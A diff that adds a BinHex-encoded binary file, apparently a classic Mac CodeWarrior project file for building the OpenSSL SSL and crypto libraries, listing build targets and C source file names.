+-D@*68d`J8&"$1P0[GA*MC5"8FQ9PF`"-D@*68d`J8&"$1N0eFh4[E5",CAPhEh*
+NF`"-D@*68d`J8&"$1N&MBf9cFb"3BA4SF`"-D@*68d`J8&"$1P4KFQGPG#"6CA4
+dD@jRF`"-D@*68d`J8&"$1NCTE'8J6@&`F'PZCh-!6'PL8e0-)&"33cT#G@PXC#"
+&H(4bBA-!6'PL8e0-)&"33cT%C@*eCfGPFL"8BA*RCA3!6'PL8e0-)&"33cSf1%X
+J3fpNC8GPEJ"-D@*68d`J8&"$1MBi5b"%DA0KFh0PE@*XCA)!6'PL8e0-)&"33cS
+f1%XJ4fa[BQ&X)%p`G'PYDATPFJ"-D@*68d`J8&"$1MBi5b"-D@jVCA)!6'PL8e0
+-)&"33cSf1%XJ8(*[DQ9MG!"-D@*68d`J8&"$1N-[3bXV)%0[EA"TE'9b!%aTBP0
+66#"38%-k3bp$+bXJ9f&bEQPZCh-!6'PL8e0-)&"33cT$4Ndf1%X!6'PL8e0-)&"
+33cT0B@028b"0CA*RC5"3B@jPE!"-D@*68d`J8&"$1P"33b"$Ef4P4f9Z!%aTBP0
+66#"38%-k8&"$)%4TFf&cFf9YBQaPFJ"-D@*68d`J8&"$1P"33b"(E'pLB@`J6h"
+dD@eTHQ9b!%aTBP066#"38%-k8&"$)%aTEQYPFJ"-D@*68d`J8&"$1P"33b"348B
+!6'PL8e0-)&"33cT38%-J8(*[DQ9MG!"-D@*68d`J8&"$1P"33d&cE5"3B@jPE!"
+-D@*68d`J8&"$1P*PHL"$Efe`D@aPFJ"-D@*$FRP`G'mJ8&"$1N4PBR9RCf9b)&*
+eER4TE@8!6'PL3h*jF(4[)&"33cT6Eh9bBf8J9(*PCA-!6'PL3h*jF(4[)&"33cT
+$GA0dEfdJ5f9jGfpbC(-!6'PL3h*jF(4[)&"33cT"Bf0PFh-J8'&dD(-!6'PL3h*
+jF(4[)&"33cT8BA*RCA3J8f9dG'PZCh-!6'PL3h*jF(4[)&"33cT'D@aP)%eKF("
+TEQGc!%aTBN0bHA"dEb"38%-k3R9TE'3J4AKdFQ&c!%aTBN0bHA"dEb"38%-k4'9
+LG@GRCA)J9'&bCf9d!%aTBN0bHA"dEb"38%-k0MK,)%0[C'9(C@i!6'PL3h*jF(4
+[)&"33cSf1%XJ4'PcBA0cC@eLE'9b!%aTBN0bHA"dEb"38%-k0MK,)%GXEf*KE#"
+2F(4TE@PkCA)!6'PL3h*jF(4[)&"33cSf1%XJ6'PZDf9b!%aTBN0bHA"dEb"38%-
+k0MK,)&"bEfTPBh3!6'PL3h*jF(4[)&"33cT$,d-V+b"$Efe`D@aPFJ"-D@*$FRP
+`G'mJ8&"$1N-[3bXV)&GKFQjTEQGc!%aTBN0bHA"dEb"38%-k3dC00MK,!%aTBN0
+bHA"dEb"38%-k6@&M6e-J6@9bCf8J8'&ZC@`!6'PL3h*jF(4[)&"33cT38%-J3fp
+NC8GPEJ"-D@*$FRP`G'mJ8&"$1P"33b"%DA0KFh0PE@*XCA)!6'PL3h*jF(4[)&"
+33cT38%-J4fa[BQ&X)%p`G'PYDATPFJ"-D@*$FRP`G'mJ8&"$1P"33b"-D@jVCA)
+!6'PL3h*jF(4[)&"33cT38%-J8%9'!%aTBN0bHA"dEb"38%-k8&"$)&"bEfTPBh3
+!6'PL3h*jF(4[)&"33cT38%0"FfdJ8'&ZC@`!6'PL3h*jF(4[)&"33cT5CASJ3fp
+YF'PXCA)!6'PL3h*jF(4[)$Bi5cT%C@*eCfGPFL"5G@jdD@eP!%aTBN0bHA"dEb!
+f1%Xk8fpeFQ0P)&4bC@9c!%aTBN0bHA"dEb!f1%Xk3h9cG'pY)%YPHAG[FQ4c!%a
+TBN0bHA"dEb!f1%Xk3@0MCA0c)&"KG'Kc!%aTBN0bHA"dEb!f1%Xk9'&bCf9d)&0
+PG(4TEQGc!%aTBN0bHA"dEb!f1%Xk4QPXC5"0BA"`D@jRF`"-D@*$FRP`G'mJ0MK
+,1N*eD@aN)%9iG(*KF`"-D@*$FRP`G'mJ0MK,1N4PBR9RCf9b)&4KFQGPG!"-D@*
+$FRP`G'mJ0MK,1MBi5b"$Ef4P4f9Z!%aTBN0bHA"dEb!f1%Xk0MK,)%4TFf&cFf9
+YBQaPFJ"-D@*$FRP`G'mJ0MK,1MBi5b"(E'pLB@`J6h"dD@eTHQ9b!%aTBN0bHA"
+dEb!f1%Xk0MK,)%aTEQYPFJ"-D@*$FRP`G'mJ0MK,1MBi5b"3FQpUC@0d!%aTBN0
+bHA"dEb!f1%Xk3bp$+bXJ3fpYF'PXCA)!6'PL3h*jF(4[)$Bi5cT$,d-V+b"ABA*
+ZD@jRF`"-D@*$FRP`G'mJ0MK,1N0'66Bi5`"-D@*$FRP`G'mJ0MK,1NeKBdp6)%e
+PFQGP)&"KEQ9X!%aTBN0bHA"dEb!f1%Xk8&"$)%0[C'9(C@i!6'PL3h*jF(4[)$B
+i5cT38%-J4'PcBA0cC@eLE'9b!%aTBN0bHA"dEb!f1%Xk8&"$)%GXEf*KE#"2F(4
+TE@PkCA)!6'PL3h*jF(4[)$Bi5cT38%-J6'PZDf9b!%aTBN0bHA"dEb!f1%Xk8&"
+$)&"&4J"-D@*$FRP`G'mJ0MK,1P"33b"3FQpUC@0d!%aTBN0bHA"dEb!f1%Xk8&"
+$3A0Y)&"KEQ9X!%aTBN0bHA"dEb!f1%Xk8Q9k)%0[EA"TE'9b!&"bEfTPBh3J4QP
+XC5"-DA0d!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!3!!!!!!!!!H!!!!!J!!!!!!!!!i!!!!!`!!!!!!!!"9!!!!"!!!!!!!!!"[!!!
+!"3!!!!!!!!#-!!!!"J!!!!!!!!#R!!!!"`!!!!!!!!$"!!!!#!!!!!!!!!$H!!!
+!#3!!!!!!!!$h!!!!#J!!!!!!!!%9!!!!#`!!!!!!!!%h!!!!$!!!!!!!!!&2!!!
+!$3!!!!!!!!&S!!!!$J!!!!!!!!'%!!!!$`!!!!!!!!'J!!!!%!!!!!!!!!'d!!!
+!%3!!!!!!!!(6!!!!%J!!!!!!!!(X!!!!%`!!!!!!!!)+!!!!&!!!!!!!!!)X!!!
+!&3!!!!!!!!*%!!!!&J!!!!!!!!*C!!!!&`!!!!!!!!*b!!!!'!!!!!!!!!+-!!!
+!'3!!!!!!!!+Q!!!!'J!!!!!!!!,$!!!!'`!!!!!!!!,F!!!!(!!!!!!!!!,i!!!
+!(3!!!!!!!!-4!!!!(J!!!!!!!!-Y!!!!(`!!!!!!!!0(!!!!)!!!!!!!!!0J!!!
+!)3!!!!!!!!0m!!!!)J!!!!!!!!18!!!!)`!!!!!!!!1a!!!!*!!!!!!!!!25!!!
+!*3!!!!!!!!2T!!!!*J!!!!!!!!3"!!!!*`!!!!!!!!3F!!!!+!!!!!!!!!3h!!!
+!+3!!!!!!!!4+!!!!+J!!!!!!!!4S!!!!+`!!!!!!!!5!!!!!,!!!!!!!!!5G!!!
+!,3!!!!!!!!5q!!!!,J!!!!!!!!69!!!!,`!!!!!!!!6T!!!!-!!!!!!!!!8"!!!
+!-3!!!!!!!!8D!!!!-J!!!!!!!!8c!!!!-`!!!!!!!!94!!!!0!!!!!!!!!9V!!!
+!03!!!!!!!!@)!!!!0J!!!!!!!!@L!!!!0`!!!!!!!!@r!!!!1!!!!!!!!!AD!!!
+!13!!!!!!!!Ad!!!!1J!!!!!!!!B4!!!!1`!!!!!!!!BU!!!!2!!!!!!!!!C)!!!
+!23!!!!!!!!CU!!!!2J!!!!!!!!D#!!!!2`!!!!!!!!DE!!!!3!!!!!!!!!Dh!!!
+!33!!!!!!!!E6!!!!3J!!!!!!!!ER!!!!3`!!!!!!!!F'!!!!4!!!!!!!!!FI!!!
+!43!!!!!!!!Fp!!!!4J!!!!!!!!GI!!!!4`!!!!!!!!Gh!!!!5!!!!!!!!!H-!!!
+!53!!!!!!!!HP!!!!5J!!!!!!!!Hr!!!!5`!!!!!!!!IC!!!!6!!!!!!!!!Ie!!!
+!63!!!!!!!!J0!!!!6J!!!!!!!!JS!!!!6`!!!!!!!!K!!!!!8!!!!!!!!!KE!!!
+!83!!!!!!!!Kd!!!!8J!!!!!!!!L-!!!!8`!!!!!!!!LR!!!!9!!!!!!!!!Lq!!!
+!93!!!!!!!!MD!!!!9J!!!!!!!!Mk!!!!9`!!!!!!!!N3!!!!@!!!!!!!!!NR!!!
+!@3!!!!!!!!P"!!!!@J!!!!!!!!PE!!!!@`!!!!!!!!PY!!!!A!!!!!!!!!Q+!!!
+!A3!!!!!!!!QK!!!!AJ!!!!!!!!Qp!!!!A`!!!!!!!!RG!!!!B!!!!!!!!!Rc!!!
+!B3!!!!!!!!S'!!!!BJ!!!!!!!!SG!!!!B`!!!!!!!!Se!!!!C!!!!!!!!!T0!!!
+!C3!!!!!!!!TU!!!!CJ!!!!!!!!U$!!!!C`!!!!!!!!UI!!!!D!!!!!!!!!Ui!!!
+!D3!!!!!!!!V8!!!!DJ!!!!!!!!VZ!!!!D`!!!!!!!!X(!!!!E!!!!!!!!!XM!!!
+!E3!!!!!!!!Xl!!!!EJ!!!!!!!!YB!!!!E`!!!!!!!!Yj!!!!F!!!!!!!!!Z3!!!
+!!(%!!!!!!!!,U!!!!()!!!!!!!!,``!!!(-!!!!!!!!,hJ!!!(3!!!!!!!!,m3!
+!!(8!!!!!!!!-$`!!!(B!!!!!!!!-*`!!!(F!!!!!!!!-4!!!!(J!!!!!!!!-C3!
+!!(N!!!!!!!!-I!!!!(S!!!!!!!!-N!!!!!"l!!!!!!!!$+J!!!"m!!!!!!!!$-%
+!!!"p!!!!!!!!$0S!!!"q!!!!!!!!$2B!!!"r!!!!!!!!$3i!!!#!!!!!!!!!$5N
+!!!#"!!!!!!!!$8%!!!##!!!!!!!!$9`!!!#$!!!!!!!!$A8!!!#%!!!!!!!!$Bd
+!!!#&!!!!!!!!$DJ!!!#'!!!!!!!!$Em!!!#(!!!!!!!!$GX!!!#)!!!!!!!!$IX
+!!!#*!!!!!!!!$K%!!!#+!!!!!!!!$LJ!!!#,!!!!!!!!$N)!!!#-!!!!!!!!$P`
+!!!#0!!!!!!!!$Qi!!!#1!!!!!!!!$SX!!!#2!!!!!!!!$U)!!!#3!!!!!!!!!!k
+q!!!!N3!!!!!!!!lH!!!!NJ!!!!!!!!ld!!!!N`!!!!!!!!m(!!!!P!!!!!!!!!m
+H!!!!P3!!!!!!!!mf!!!!PJ!!!!!!!!p1!!!!P`!!!!!!!!pY!!!!Q!!!!!!!!!q
+)!!!!Q3!!!!!!!!qQ!!!!QJ!!!!!!!!r"!!!!Q`!!!!!!!!rI!!!!R!!!!!!!!!r
+l!!!!R3!!!!!!!"!@!!!!RJ!!!!!!!"!d!!!!R`!!!!!!!""1!!!!S!!!!!!!!""
+Y!!!!S3!!!!!!!"#3!!!!!+)!!!!!!!!3U3!!!+-!!!!!!!!3``!!!+3!!!!!!!!
+3i!!!!+8!!!!!!!!3r3!!!+B!!!!!!!!4%J!!!+F!!!!!!!!4-J!!!+J!!!!!!!!
+46!!!!+N!!!!!!!!4D`!!!+S!!!!!!!!4MJ!!!+X!!!!!!!!4T`!!!+`!!!!!!!!
+4[3!!!+d!!!!!!!!4e`!!!+i!!!!!!!!4mJ!!!+m!!!!!!!!5$3!!!,!!!!!!!!!
+5,!!!!,%!!!!!!!!54`!!!,)!!!!!!!!5C3!!!,-!!!!!!!!5J!!!!,3!!!!!!!!
+5RJ!!!,8!!!!!!!!5ZJ!!!,B!!!!!!!!5e3!!!,F!!!!!!!!5m`!!!,J!!!!!!!!
+6$3!!!,N!!!!!!!!6,!!!!,S!!!!!!!!66`!!!,X!!!!!!!!6D!!!!,`!!!!!!!!
+6JJ!!!,d!!!!!!!!6R`!!!,i!!!!!!!!6[!!!!,m!!!!!!!!6d3!!!-!!!!!!!!!
+6m3!!!-%!!!!!!!!8#`!!!-)!!!!!!!!8+J!!!--!!!!!!!!863!!!-3!!!!!!!!
+8CJ!!!-8!!!!!!!!8I!!!!-B!!!!!!!!8PJ!!!-F!!!!!!!!8X3!!!-J!!!!!!!!
+8c!!!!-N!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!1J!!!$X!!!!m!!!!23!!!$i!!!!e!!!!1!!!!$m!!!"!!!!!33!!!$3!!!!b!!!
+!13!!!$F!!!"#!!!!3`!!!%3!!!"&!!!!4J!!!%F!!!")!!!!53!!!%S!!!!c!!!
+!0J!!!!J!!!!*!!!!#J!!!!X!!!!-!!!!!`!!!!B!!!!0!!!!$J!!!!m!!!!#!!!
+!!!!!!!F!!!!&!!!!%!!!!"%!!!!5!!!!%`!!!"3!!!!9!!!!&J!!!"F!!!!B!!!
+!!3!!!!3!!!#h!!!!Z!!!!,N!!!#k!!!!Z`!!!,)!!!#e!!!![!!!!,d!!!#q!!!
+!X3!!!+m!!!#f!!!!Y!!!!,m!!!$!!!!!`3!!!-)!!!$$!!!!a!!!!-8!!!$'!!!
+!a`!!!,!!!!#c!!!!RJ!!!*m!!!#J!!!!S3!!!+)!!!#C!!!!R!!!!+-!!!#N!!!
+!T3!!!*J!!!#@!!!!R3!!!*X!!!#Q!!!!T`!!!+J!!!#T!!!!UJ!!!+X!!!#X!!!
+!V3!!!+i!!!#A!!!!QJ!!!&-!!!"8!!!!93!!!&B!!!"A!!!!6J!!!&%!!!"B!!!
+!@3!!!&S!!!"0!!!!5`!!!&)!!!"3!!!!@`!!!&`!!!"G!!!!AJ!!!&m!!!"J!!!
+!B3!!!')!!!"M!!!!6!!!!%m!!!#&!!!!KJ!!!)F!!!#)!!!!L3!!!)!!!!#$!!!
+!LJ!!!)X!!!#-!!!!I`!!!(d!!!#%!!!!JJ!!!)d!!!#1!!!!M`!!!*!!!!!!N3!
+!!*)!!!#6!!!!P!!!!*8!!!"q!!!!J3!!!'`!!!"Y!!!!EJ!!!'m!!!"`!!!!C`!
+!!'S!!!"a!!!!FJ!!!(-!!!"Q!!!!C!!!!'X!!!"T!!!!G!!!!(8!!!"f!!!!G`!
+!!(J!!!"j!!!!HJ!!!(X!!!"m!!!!C3!!!'J!!!!K!!!!)J!!!#-!!!!N!!!!*3!
+!!"`!!!!I!!!!*J!!!#F!!!!S!!!!'`!!!"N!!!!J!!!!(J!!!#N!!!!U!!!!+`!
+!!#`!!!!Y!!!!,J!!!#m!!!!`!!!!-3!!!"S!!!!G!!!!b!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!690-)%-Z8&"$,NaTBJ"*ER4
+PFQCKBf9-D@)!6@&dD%aTBJ"08d`J8R9ZG'PYC9"33bj-D@)!6h"PEP4`G%PZCA4
+38%-ZE`"2F'9Z9("d5@jdCA*ZCA4-D@)!6h"PEP4bB@jcF'pbG%9iG'j38%-ZE`"
+2F'9Z9(*KER0`Eh*d6'PL!&4SFQ9KC(0-D@)!BQP[Ah0cE#jM!(-b-epME'jd,Q-
+!Fc)cAfaTBLjM!(-b-epYCA4S,Q-!Fc)cAh"VG#jM!(-b-epcFRCb,Q-!Fc*IBfa
+ZG#jM!(-bAf9ZBbjM!(-bAfaTBLjM!(-bAfePG'JZB`"c-Pp`Dh3ZB`"c-PpcFRC
+b,Q-!Fc0IBQpdD#jM!(-cAf0XER3ZB`"c-epPEQ-ZB`"c-epXD@)ZB`"c-epYCA4
+S,Q-!Fc0IF'Yd,Q-!Fc0IFh*fFLjM!(0cE&pKE'Gc,Q-!Fh0XAf&cEM%ZB`"cFfa
+IBf9bG#jM!(0cE&pMDA"S,Q-!Fh0XAf9bFLjM!(0cE&pPFR)b,Q-!Fh0XAfaTBLj
+M!(0cE&pbFf%ZB`"cFfaIFf9cFbjM!(0cE&pcG'&d,Q-!Fh0XAh4iG#jM!(3aAf0
+XER3ZB`"d-9pPEQ-ZB`"d-9pXD@)ZB`"d-9pYCA4S,Q-!G$&IFh*fFLjM!'&cEM&
+ICA*b,Q-!BA0Z-9pXD@)ZB`"KFfiaAh"KFLjM!'&cEPp`B@0V,Q-!B9pLDA4cG()
+ZB`"KAf*YF#jM!'&IBQp[E#jM!'&IBRPdCA-ZB`"KAf3bD9pQF#jM!'&IC'PRCA0
+d,Q-!B9pNGA!ZB`"KAf9ZG@dZB`"KAfGPER4Y,Q-!B9pSC()ZB`"KAfNbC&pQF#j
+M!'&ID@jd,Q-!B9pYCA4S,Q-!B9p[BQTPBh3ZB`"KAfpMG'9d,Q-!B9p`FQPZG#j
+M!'&IFf9d,Q-!B9pcD@GZ,Q-!B9pdD@eP,Q-!B9pdHA"P,Q-!B9peG'0dE5jM!'&
+IGA4Q1#jM!'&IGQ9bD@Cj,Q-!B9pfDA-ZB`"N-QPIC'K`,Q-!C$*TAf4cBA!ZB`"
+N-QPIF()ZB`"N-QPIF(8ZB`"N-QPIFPp`FLjM!'3bD9pbAh"e,Q-!C$*TAh0IF()
+ZB`"N-QPIFep`G5jM!'9fF&pKFfia,Q-!CPpPER9Y,Q-!CPpTER3ZB`"QAh0dFQP
+ZCbjM!'NbC&pND(!ZB`"T-Q4IC(0KF#jM!'NbC&p`FLjM!'NbC&p`G5jM!'NbC&p
+bAh"b,Q-!D6*NAh*IF(8ZB`"T-Q4IFep`FLjM!'NbC&pcAh"e,Q-!ER0cCA%ZB`"
+ZAh"VCANZB`"`09p`BQ8ZB`"`09p`BQ9f-LjM!(!hAf4RFh3ZB`"`0epPEQ-ZB`"
+`0epPEQ0IBbjM!(!hAf9fF#jM!(!hAfPIFbjM!(!hAfaTBLjM!(!hAh*PBfP`,Q-
+!F$GIFfPREQ3ZB`"`0epcD@GZD5jM!(!hAh0IC5jM!(!iAh"VCANZB`"dAf0bE#j
+M!(4IF'YPH5jM!(4IFQ9a,Q-!G&pi06!j,Q-!H&pKE'G[FLjM!(KIBA4dFQPL,Q-
+!H&pMD@jQ,Q-!H&pMFQ`ZB`"iAf9iG'9Z,Q-!H&pTEQC[,Q-!H&pZB@eP,Q-!H&p
+`Df9j,Q-!H&p`G@*VCANZB`"iAh*PF5jM!(KIFfPR,Q-!H&pcF'YT,Q-!H&pfB@`
+ZB`"iAhJe-$NZB`"LCPpMCQ)f0#jM!'*QAf9MBLjM!'*QAf9ZBbjM!'*QAfpQBMB
+d,Q-!BQCIFfYPH5jM!'*TEepPFR)ZB`"LD@pIE'PL,Q-!BR0cAh0[BfXZB`"LEPp
+KC'3ZB`"LEPpKFfdZB`"LEPpLE'PZC#jM!'*ZAf4TGLjM!'*ZAf9bFLjM!'*ZAf9
+iF#jM!'*ZAf9iF$)ZB`"LEPpRBf3ZB`"LEPpXD@)ZB`"LEPpYEfjd,Q-!BQjIEA"
+T,Q-!BQjIEA9X,Q-!BQjIF(*TE@8ZB`"LEPp`FQPZG#jM!'*ZAh*KEQ3ZB`"LEPp
+bC@0`,Q-!BQjIFfKTCR3ZB`"LEPpcFA)ZB`"LEPphEh*N,Q-!BR9QCQ9b,Q-!BR9
+QAf9bFLjM!'0IBfCL0M3ZB`"MAf9MBLjM!'0IC@jM,Q-!Bep[CQ)f0#jM!'0IFfY
+PH5jM!'0[EA"IE'PL,Q-!BepbE'8ZB`"MAhTXD@)ZB`"MEfjQ,Q-!BfpZCPpPFR)
+ZB`"MBQ0IBfYcE5jM!'0LBepPEQ-ZB`"MCQ)f0'9NC5jM!'0QBMBdC@jM,Q-!BfC
+LAf9ZBbjM!'4PFepPEQ-ZB`"PBf)cAf9ZBbjM!'9MBPpPEQ-ZB`"PC'9IBf*ME9p
+PEQ-ZB`"PEQ0IFQ9KC#jM!'CMFRP`G#jM!'CMFRP`G&pL,Q-!EfCL0M4PC'8ZB`"
+[CQ)f0'9ZBbjM!'pQBPpPEQ-ZB`"`Bf*MAf9ZBbjM!(&eC&pMDh0Y,Q-!FQ&ZC&p
+VCANZB`"bC@&N-R"hC#jM!(*PB@4IF(GN,Q-!FR"MAf9ZBbjM!(0PG&pVCANZB`"
+cG()bDf9j,Q-!Fh9`F#jM!(KMBQ0IC@jM,Q-!C'KIBfKPBfXZB`"ND&pPFR)ZB`"
+ND&pRC@iZB`"ND&pVCANZB`"ND&pXD@)ZB`"NFf&IBA0Z-5jM!'4cB9pPFR)ZB`"
+NFf&ICf9Z,Q-!C(0KAfYPH5jM!'4cB9pXD@)ZB`"NFf&IFfPRELjM!'4cB9pfFQB
+ZB`"PFR)ZB`"PFR*IB@aX,Q-!CA*bAh"bELjM!'*TEepL0M3ZB`"LD@pIC@jM,Q-
+!BQP[AfeN,Q-!BQP[AfpV,Q-!BepKE'`ZB`"ND@GPFh3ZB`"PEQ0[C'8ZB`"PGR"
+IC@jM,Q-!CAC`Af9bFLjM!'9fF&pVCANZB`"PGR"IE'PL,Q-!CAC`Ah"LC5jM!'9
+fF&p`Df9j,Q-!C9pMBQ0I-f3ZB`"PAf0LBepLCLjM!'9IBf*MAf-ZB`"PAf0LBep
+N,Q-!C9pMBQ0ID5jM!'9IBf*MAh)b,Q-!C9pMBQ0IFM8ZB`"PAf0QBPmcC#jM!'9
+IBfCLAf*Q,Q-!C9pMCQ*IBbjM!'9IBfCLAf3ZB`"PAf0QBPpT,Q-!C9pMCQ*IFM)
+ZB`"PAf0QBPpb05jM!'9IC@0LAc0N,Q-!C9pPBf*IBQBZB`"PAf9MBPpM,Q-!C9p
+PBf*IC#jM!'9IC@0LAfNZB`"PAf9MBPpb-LjM!'9IC@0LAh)e,Q-!C9pZG@aX,Q-
+!C9p[CQ*I-f3ZB`"PAfpQBPpLCLjM!'9IEfCLAf-ZB`"PAfpQBPpN,Q-!C9p[CQ*
+ID5jM!'9IEfCLAh)b,Q-!C9p[CQ*IFM8ZB`"PAh*M0#jM!'9IH'0LBepN,Q-!E9p
+NFh-ZB`"YAf4cFc%ZB`"YAfeN-LjM!'eIE@3e,Q-!E9pYC'-b,Q-!E9pZG@aX,Q-
+!E9pbDA"PE@3ZB`"YAh0SB5jM!'eIFfKK-5jM!'jKE@9c,Q-!F&pNC@-ZB`"`Af9
+ZBbjM!("IE'PL,Q-!F&p[F'9Z,Q-!F&pcC@&X,Q-!F&pcD@GZ,Q-!F&pfCA*TCRN
+ZB`"SE@&M,Q-!D9pMBQ-ZB`"TAf0QBMBd,Q-!D9pPBf)ZB`"TAfpQBMBd,Q-!D9p
+cDf9j,Q-!E'KKFfJZB`"XD&pcG'&dFbjM!'eN-PpNCh0d,Q-!E@3bAfpZC5jM!'e
+N09pNCh0d,Q-!E@3eAfpZC5jM!'eNBc*NCh0d,Q-!E@4M-Pp[EQ8ZB`"[BQTIC'&
+d,Q-!Ef*UAf9bFLjM!'pLDPpXD@)ZB`"[AfjKE@9c,Q-!F'9YAf&XE#jM!("PE9p
+PFR)ZB`"`C@eID@jQEbjM!("PE9pXD@)ZB`"`C@eIFf9KE#jM!("PE9pcD@GZ,Q-
+!F$%bAf&NC#jM!(!a-PpKG(4b,Q-!F$%bAf*KCh-ZB`"`-6*IBh*`G#jM!(!a-Pp
+MFR3ZB`"`-6*IC'9MFLjM!(!a-PpTEQPd,Q-!F$%bAfYPH5jM!(!a-PpVDA0c,Q-
+!F$%bAfaTBLjM!(!a-PpYB@-ZB`"`-6*IEA9dE#jM!(!a-PpcBQ&R,Q-!F$%bAh9
+dE#jM!("V-6*PFR)ZB`"`DcGIC'pTG#jM!("V0epXD@)ZB`"`Df0c0f9bFLjM!'e
+NAh*KEQ3ZB`"bB@jNCQPXC5jM!(*KEQ4IE'PL,Q-!FQ-bBfCL0M3ZB`"bBc*[CQ)
+f0#jM!(*M-PpMBQ-ZB`"bBc*IC@0L,Q-!FQ-bAh0VCANZB`"bBc4IC@jM,Q-!FQ-
+dAh0VCANZB`"bBc9MCQ)f0#jM!(*M0@pQBMBd,Q-!FQ-eAf9MBLjM!(*M09pPEQ-
+ZB`"bBc9IFfYPH5jM!(*YC&pNCh0d,Q-!FQeNAfpZC5jM!(*cB9pPBANZB`"bFf&
+ICA*b,Q-!FR0KAfGPELjM!(*cB9pXD@)ZB`"bFf&IEQpZC5jM!(*cB9p[B@9`,Q-
+!FR0KAh"V-5jM!(*cB9pcB@pc,Q-!FR0KAh0TCfiZB`"bFf&IFh0X,Q-!FfKK-@4
+RFh3ZB`"cD'%aAfpZC5jM!(0SB9pNCh0d,Q-!FfKKAfpZC5jM!(0dB@0V,Q-!G(K
+dAf4L,Q-!BRPIC'Pb,Q-!BRPICQPXC5jM!(Je-$PZB@eP,Q-!H$8`1A*cCA3ZB`"
+i06!jG(P`C5jM!(Je-$PIBfe`,Q-!H$8`19pN-LjM!(Je-$PIC'9Q,Q-!H$8`19p
+PFR)ZB`"i06!jAf9iG#jM!(Je-$PIE(8ZB`"i06!jAfpLDLjM!(Je-$PIFM*i,Q-
+!H$8`19pbCA%ZB`"i06!jAh0PG#jM!(Je-$PIG(Kd,Q-!H$8`19pf-bjM!(Je-$P
+IGQCj,Q-!H&pKE'`ZB`"f-f9bFLjM!(BcAf&VCANZB`"f-epKE(3ZB`"f-epLBfp
+ZFbjM!(BcAf*TG(0d,Q-!GM0IBfpZCLjM!(BcAf0`Efac,Q-!GM0IBh*XC#jM!(B
+cAf9ZG@dZB`"f-epPH(4VG5jM!(BcAfGPEQiZB`"f-epTB68ZB`"f-epTER3ZB`"
+f-epXD@)ZB`"f-ep`Dh8ZB`"f-ep`FQiZB`"f-epcDf9j,Q-!GM0IFhKZCA3ZB`"
+f-epeG'`ZB`"MF(4ICA*b,Q-!Bh*jF(4XD@)ZB`"PH&pNBA4K,Q-!E@9Y,Q-!690
+-)&0*6e9B,P"33bj-D@)!BQCIBR9QCLjM!(KIH$8`1@%ZB`"NFf&IEh0cE#jM!(J
+e-$PcF'YT,Q-!H$8`19pdFR-ZB`"f-ep`GA*`,Q-!GM0ID@jQEbjM!'*IF(*TER3
+ZB`"KAfeLFh4b,Q-!G&pcF'YT,Q-!G&pi06!jB5jM!(4IBQPdFh3ZB`"KAh0dFQj
+TC#jM!'*TEepMBLjM!'*cFepYC@dZB`"LFh0ICQ3ZB`"LFh0ICQPXC5jM!'*cFep
+ZG@aX,Q-!BQCIER9XE#jM!'*QAfjLD@mZB`"LFh0IBQP[,Q-!BPpNG@e`,Q-!C@j
+MAhGbDA3ZB`"`09pMFR"d,Q-!F$9IBh*`G$)ZB`"`-6*IER"KFbjM!("V0epKG(4
+b,Q-!F'XhAfeTE@8ZB`"`DcGIFfeTE@8ZB`"bFf&IBfKV,Q-!FR0KAfjeE'`ZB`"
+MGQ9bFfP[ELjM!%038h4bD@jR9A4TE(-ZBh"`!%9bFQpb5'&ZC'aTEQFZBh"`!%G
